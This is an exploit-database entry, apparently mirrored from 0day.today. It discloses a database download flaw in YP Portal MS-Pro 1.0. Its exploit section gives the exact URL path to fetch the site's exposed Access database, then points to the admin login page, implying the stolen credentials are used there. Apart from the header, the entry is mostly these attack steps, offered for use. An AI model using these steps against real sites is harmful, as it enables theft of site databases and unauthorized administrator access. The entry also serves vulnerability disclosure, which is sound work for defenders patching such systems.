id: 10613
date: 01/05/2010
title: YP Portal MS-Pro Surumu 1.0 DB Download Vulnerability
author: indoushka
cves: 

=====================================================
YP Portal MS-Pro Surumu 1.0 DB Download Vulnerability
=====================================================

========================================================================================                 
| # Title    : YP Portal MS-Pro Surumu 1.0 DB Download Vulnerability
| # Author   : indoushka   
| # Script   : Powered by YP Portal MS-Pro                    
| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) IIS 5.0                              
| # Bug      : DB                                                                     
======================      Exploit By indoushka       =================================
 # Exploit  :
  
 1- http://server/mspro12/galeri/database/db.mdb
    
 2- login
     
    http://server/mspro12/galeri/yonet/admin.asp



#  0day.today [2023-03-24]  #